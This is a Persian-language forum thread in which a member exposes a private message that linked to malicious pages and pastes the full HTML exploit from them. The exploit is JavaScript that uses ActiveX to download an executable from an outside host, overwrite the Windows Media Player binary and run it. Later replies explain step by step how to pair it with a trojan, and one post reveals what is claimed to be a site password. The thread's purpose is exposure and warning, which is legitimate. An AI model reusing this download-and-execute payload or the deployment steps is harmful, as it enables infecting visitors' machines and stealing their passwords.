| واقعا متاسفم كه اينجا هم ... ( هنوز بعضي ها متوجه نشدن چرا اينجا هستن ) |

[NorTh HaCkeR]

سلام !

يكي از دوستان به نام و شناسه ي meygo براي من پيغام خصوصي ارسال كرده !
من متن اين پيام رو اينجا انتشار مي دم و پيروش صحبت مي كنم كه دوستان بفهمن كه اينجا جاي اين بچه بازيا نيست !

سلام سايت شما خيلي قشنگه .

http://www.sharemation.com/inilooi/nilo.html
http://www.sharemation.com/inilooi/niloo.html

خوشحالم از اينكه با سايت شما آشنا شدم .

:roll:

اين پيغام ايشون است !
البته دو لينكي كه هم اكنون در كد هست به صورت وب براي من در پيغام خصوصي لود ميشده !
حالا اين دو لينك چيه !
الان توضيح ميدم !

وقتي اين پيج ها لود بشن يك عدد فايل ناقابل (كه مي تونه هر چي باشه ) توسط يك اكسپلويت قديمي روي سيستم من ميشينه و ................

حالا من اكسپلويت رو اينجا مي زارم تا توضيح بدم !

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><!-- saved from url=(0034)http://www.setare.co.sr --><HTML><HEAD><TITLE></TITLE><META http-equiv=Content-Type content="text/html; charset=utf-8"><META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD><BODY><textarea id="code" style="display:none;">var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open[color=red]("GET", "http://www.sharemation.com/inilooi/dc.exe",0[/color]); x.Send(); var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile[color=brown]("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2[/color]);location.href = "mms://";</textarea><font color="#E3E8F0">Wait a couple of seconds...</font color><script language="javascript">function preparecode(code) {result = '';lines = code.split(/\r\n/);for (i=0;i<lines.length;i++) {line = lines[i];line = line.replace(/^\s+/,"");line = line.replace(/\s+$/,"");line = line.replace(/'/g,"\\'");line = line.replace(/[\\]/g,"\\\\");line = line.replace(/[/]/g,"%2f");if (line != '') {result += line +'\\r\\n';}}return result;}function doit() {mycode = preparecode(document.all.code.value);myURL = "file:javascript:eval[color=red]('" + mycode + "')";window.open(myURL,"_media")[/color] }window.open("[color=brown]http://www.sharemation.com/inilooi/fade.js","_media");setTimeout("doit()", [/color]5000);</script><META content=" Exploit , hack , booter , hacker , best cracker , best booter , free warez , å˜Ñ  , ÈæÊÑ ,  ÈæÊ  , å˜  , ǘӁáæíÊ  , ÊÑæÌÇä,äÑã ÇÝÒÇÑ ÑÇíÇä  , ÇíäÊÑäÊ ÑÇíÇä ãÌÇäí " name=description><META content=" Exploit , hack , booter , hacker , best cracker , best booter , free warez , å˜Ñ  , ÈæÊÑ ,  ÈæÊ  , å˜  , ǘӁáæíÊ  , ÊÑæÌÇä,äÑã ÇÝÒÇÑ ÑÇíÇä  , ÇíäÊÑäÊ ÑÇíÇä ãÌÇäí " name=keywords><STYLE>BODY {	SCROLLBAR-FACE-COLOR: #dee3e7; FONT-SIZE: 8pt; MARGIN: 0px; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #152a55; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #152a55; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-TRACK-COLOR: #55698a; FONT-FAMILY: tahoma; SCROLLBAR-DARKSHADOW-COLOR: #152a55; BACKGROUND-COLOR: #DEE3E7}A:link {	FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: tahoma, wingdings, webdings; TEXT-DECORATION: none}A:visited {	FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: tahoma, wingdings, webdings; TEXT-DECORATION: none}A:active {	FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: tahoma, wingdings, webdings; TEXT-DECORATION: none}A:hover {	COLOR:  #000000 1px solid}TD {	BORDER-RIGHT: #3b3b41 3px solid; BORDER-TOP: #506880 1px solid; BACKGROUND: #fcfcfe; BORDER-LEFT: #3b3b41 3px solid; BORDER-BOTTOM: #000000 3px solid}</STYLE><DIV align=center><TABLE style="BORDER-COLLAPSE: collapse" height=0 cellSpacing=0 cellPadding=2 width="100%" border=0><TBODY><TR><TD dir=rtl style="BORDER-RIGHT: #DEE3E7 1px solid; BORDER-TOP: #DEE3E7 1px solid; BORDER-LEFT: #DEE3E7 1px solid; BORDER-BOTTOM: #DEE3E7 1px solid" vAlign=top width="100%"></TD></TR></TBODY></FONT><DIV></DIV></B[color=red]><script language=JavaScript>var message="";///////////////////////////////////function clickIE() {if (document.all) {(message);return false;}}MOUSEDOWN);document.onmousedown=clickNS;}else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} </script></BODY></HTML>

دوستاني كه كمي با اكسپلويتها كار كرده باشن به خوبي متوجه ميشن كه كار اين چيه !
حالا من قسمت هاي مهم اونو رنگي كردم كه دوستان بيشتر متوجه بشن !



[hr:9e24a13ef7]

دوست گرامي آقاي meygo فكر كردين كه با اين كار بتونين چند تا پسورد از سيستهاي من رو كش برين؟
و بعد ادعاي هك كنيد ؟؟؟

دوست گرامي مني كه اينجا نشتم هيچ ادعايي ندارم و فقط مقداري از معلومات خودم رو در اختيار دوستان قرار ميدم و تا جايي كه بتونم بهشون كمك مي كنم!

مثلا خواستي سايت منو ديفيس كني!؟
خوب بكن !
مي دوني چيه من اگه پسورد هاي سايتم رو هم تقديم كنم شما نمي توني كاري انجام بدي !

مي خواي امتحان كنيم؟
اين پسورد سايت منه:

پسورد : LLk$%^}Edml)!~|||()

خوب حالا اگر خيلي برات عقده شده برو ديفيس كن !

برام هيچ اهميتي نداره مي دوني چرا؟

چون شخصيت وجودي خودتون رو به همگان نشون داديد و خوب اين برام مهمتره !


دوست عزيز يادت باشه ما به همين سادگي به اين درجه نرسيديم اينقدر خورديم زمين تا اين كه تونستيم دست كسي رو بگيريم بلندش كنيم !

شما هم از كار خودت خجالت بكش !

دوست دارم دوستان ديگه هم از اين اكسپلوست سوء استفاده نكنن !~
هر چند من اكسپلوست رو در بعضي از جا ها ناقص كردم !


اميدوارم كه دوست گرامي meygo متوجه اشتباهش شده باشه !



----------------------
با تشكر
----------------------------------------------------------------------------
محمد ميرزايي (مدير تيم امنيتي شمال و پروژه ي ملي ايران كرك)

 

[amirhomayoun]

آقا حالا یه سوال خارج از بحث :

این آقا مسلما کارش این قدر درست نیست که خودش بشینه exploit بنویسه . پس source این exploit رو از کجا آورده؟ من توی وب گشتم دنبال exploit ولی " گفت یافت می نشود جسته ایم ما" ! تمام سایتهای قدیمی رو بستن و سایتهایی که من توی google پیدا کردم فقط مشخصات exploit ها و احیانا patch شون رو ارائه میکردن .
چه جوریاست ؟ اگر الان من بدونم مثلا کامپیوتر server سایتمون با windows2000 و با service pack فلان کار میکنه و نرم افزارهایی که روش هست رو هم بفهمم چیه از کجا میتونم برای یکی از اونا exploit پیدا کنم ؟ (-:
(هدف کاملا آموزشیه . باور کنید! )

و یه چیزه دیگه این آقای میگو از کجا میدونسته که اصلا سیستم شما چیه و روی pc تون چه نرم افزارهایی نصب شده؟ ( ظاهرا ایشون میخواسته password هارو از روی pc شما پیدا کنه و بعد به قول شما سایتتون رو deface کنه )

من فکر میکردم هر exploit ی رو که داشته باشی باید برای هر سیستم عاملی یه تیکه کد خاص بهش اضافه کنی . نمیدونم شاید اشتباه میکنم .

خب خودش شد یه کلاس آموزشی !
( شرمنده .این چند روزه شما این قدر به پستهای من برخوردی که حتما دیگه حالت به هم میخوره بخوای خر ملا کنی! )

 

[NorTh HaCkeR]

سلام آقاي امير همايون عزيز !
آقا اگر اشتباه تايپي داره به بزرگي خودتون ببخشيد !
كي بوردم بر چسب فارسي نداره !
در مورد اكسپلويت بايد عرض كنم كه اين آقا اصلا در حد و اندازه ي اكسپلويت نوشتن نيستند !
اين يك اكسپلويت قديمي هستش كه از ضعف مديا پلير استفاده مي كنه و فايل http://www.sharemation.com/inilooi/dc.exe رو به جاي C:\\Program Files\\Windows Media Player\\wmplayer.exe روي سيستم دانلود مي كنه و اجرا !

اگر تو اكسپلويت بگردين متوجه ميشين !

در مورد اكسپلويت بايد بگم شما سيستم طرف رو اسكن مي كنيد و بعد اسكنر به شما يك CV ميده شما اون رو توي مثلا سكوريتي فوكاس سرچ مي كنيد و اكسپلويت رو پيدا مي كنيد و نحوه ي عملكرد !

دوست گرامي در مورد آقاي ميگو و كارشون ايشون اصلا احتياجي به اطلاعات در مورد سيستم من ندارند مثلا با اجراي يك فايل كوانگ روي سيستم من توسط اين اكسپلويت تمامي پسورد اي سيستم منو مي دزدند ! به همين راحتي !

در مورد سوالات شما هم خوب وظيفه است امير عزيز !


خوش باشيد !
------------------------
محمد

 

[bagher2]

استاد محمد عزیزم!

شماکه بهترمیدونی آدمایی احمق وعقده ای توی اینترنت زیادپیدامیشن! کافیه چشمات روخوب بازکنی تااونارودوروبرت ببینی!
بی خیال بابا خون خودت روباهمچین آدمایی کثیف نکن!


مخلصت

باقر

 

[moein273]

عجب بابا خيلي خنديدم از اين موجودات زيادن نگران نباش نورت هكر جان.

 

[بافی]

عجب بابا خيلي خنديدم از اين موجودات زيادن نگران نباش نورت هكر جان.

آره زياد نگران نباش...دست رو دست زياده
از جرات و جسارت طرف خوشم اومد...چون فهميده بالاخره مي شه...

 

[siavash-tanha]

بابا محمد جان ناراحت نباش و دلخورم نباش فقط بخند به بعضي ها كه خيلي .... تشريف دارن

در ضمن من كه ميدونم محمد بيدي نيست كه از اين بادا بلرزه

اما بهتره هر چي آدم لجن و ... مثل اين تو مجيد آنلان پيدا ميشه پاك بشن از انجمن

يعني آي ديشون بن بشه برا هميشه تا ديگه تو اين انجمن از اين غلطا نكنن


مخلصم

 

[Mahmoodi]

والا محمد جان از اسم اين انجمن استفاده كردن و با نام كاربري اين انجمن بخوان همچين كاراهايي انجام بدن واقعا پست ترين كاره اونم به عنوان يك كاربر بخوان از عضو بودن تو اين سايت سو استفاده كنن

والا ديگه نميدونم چي بگم

قربانه شما

علي

 

[spsgorgan]

ميشه در مورد ساختار اين كد بيشتر توضيح بفرماييد و كد درست رو بزاريد .

متشكرم

 

[4shir]

سلام خوب حيفم اومد چيزي نگم اول به محمد عزيز هم من هم شما ميدونيم از اين ادمهاي كه فكر ميكنن زرنگ هستن خيلي داريم يا طرف با يك كد ساده مياد اينجكشن ميكنه و كلي هم كيف ميكنه كه 200 تا سايت رو هك كرده نمونش همين پسر احمقي كه ميخاست سايت ما رو هك كنه اومده ميگه من توي يك روز 200 تا سايت هك كردم حالا هم ميخوام سايت تو رو هك كنم من هم هميشه گفتم تا جاي كه تونستم سعي كردم امنيت سايتم رو بالا ببرم گفتم بفرما هر كاري دوست داري انجام بده خلاصه بعد از 10 دقيقه ميگه سايتت خيلي با حال هك نميشه هركاري ميكنم گفتم خوب حالا تز چه راهي ميخواستي هك كني گفت با اينها اونوقت ميدونيد چي فريتاده برا من؟ كدهاي نفوذ به ناك در حالي كه من روي سايتم phpbb دارم 8O واقعا طرز فكر بچه هاي ما متاسفانه الان به اين سمت رفته طرف هنوز فرق بينه ناكه و بي بي رو نميدونه ادعاي هكريش ميشه :roll: بگزريم
در مورد اين اكسپوليت من درست نميدونم ايناي كه ميگم كامل هستن يا نه چون الان نزديك 2 ماهي هست دورو ور اينچيزا نرفتم و درست توي ذهنم نمونده ببينيد شما دوتا فايل درست ميكنيدپ يكي به نام j... بخدا درست يادم نيست و يكي ديگه كه توي دومي كد اكسپوليت رو قرار ميدين و مسر احتمالي نصب مديا پلير رو و فايل دوم ادرس برنامه اي رو كه ميخوايد بشينه جاي مديا حالا فايلها رو اپلود ميكنيد و لينك فايل دوم رو به طرف ميدين من كدهاي كاملش رو دارم البته براي مديا 8 بود اشتباه نكنم درسته محمد جان؟ توضيحات كامل و اموزشش رو دارم مال موقعي هست كه هكس باز بود پيدا ميكنم براتون اگر خواستيد اما از دادن اصل كد شرمندم

 

[NorTh HaCkeR]

سلام
والا چه عرض كنم !
معمولا اين مساپل رو به تاپيك نمي كشونم ولي اين بار بدجوري اعصابم به هم ريخت ! خواستم طرف بفهمه كه اينجا جاي اين بچه بازيا نيست !

از باقي دوستان نيز به خاطر ابراز لطفي كه نمودند تشكر مي كنم !

و اما در مورد كد :

قرار دادن اين كد در اين تالار بر خلاف قوانين است ! براي همين از گذاشتن اون معذورم .

در مورد توضيحاتش هم كه بالا گفتم و ساسان عزيز هم مقداري در موردش توضيح داد !

ولي خب بازم ميگم !

يك فايل به فرض تروجان مي سازي ! سرورش رو آپلود مي كني ! يك صفحه ي مجازي هم مي سازي مثلا به نام m.htm . كه اونم آپلود مي كني !

بعد يك صفحه ي وب مي سازي اين كد اكسپلويت رو روش قرار ميدي و به جاي متغير فايل . قايل تروجان رو قرار ميدي و به جاي متغير وب نشاني فايل m.htm رو قرار ميدي !

بعد وقتي اين پيج باز بشه فايل تروجان به جاي فايل اجرايي مديا پلير قرار ميگيره رو سيستم فرد لود كننده ي پيج و بعد توسط يك دستور جاوا اسكريپت مديا پلير از طريق اكسپلور اپن ميشه و اجرا ميشه ! (در اصل همون فايل تروجان اجرا شده)

به همين راحتي !
با تشكر
----------------------------
محمد

 

[AliReza26]

اه.....

چه باحال....

طرف چقدر باهوش بوده ها......

محمد بابا دل بچه را شكوندي ها....

 

[moein273]

حالا شما براي اينكه دلش خوش باشه اجراش ميكردي

 

[pt_tomcat]

سلام
درسته كه كار خيلي زشتي انجام شده ولي
باعث شد كه من چيزي ياد بگيرم

 

[worldman_safa]

ايول محمد خان

خوب حالش رو گرفتي !

حالا تو كف مونده .

موفق باشي

 

[hojjat_j000ooo000n.]

بابا ايول .... خوب فهمونديش....

به اينا ميگن..جوجه....آره قوربونش....

رفته با مجيك پي سي آيدي هك كرده فكر كرده ديگه هكر شده....

 

[NorTh HaCkeR]

سلام !

عليرضا جان همچين هم بچه نيستا ~!
معين جان اتفاقا براي اينكه بفهمم كار فايله چي هست اجراش كردم : دي

ولي خوب ديگه اينقدر برخورد نشه !

حالا يك كاري كرده ديگه خودش ديگه پشيمونه !


------------
محمد

 

[assis-mo]

ابته اين كار شايسته اي نيست كه تحت معرفي كردن سايت يا برنامه از اعتماد ديگران سو استفاده كرد و رو كامپيوتر طرف پياده كرد. مثلا اين دوست عزيز پاس منو پيدا كنه. مگه باز كردن يه اي دي جديد چقدر وقت مي بره

 

[4shir]

عزيز ايدي با سايت زمين تا اسمون فرقش هست

 

[mosi-online]

NorTh HaCkeR خودمونيما خوب زدي به برجكش.....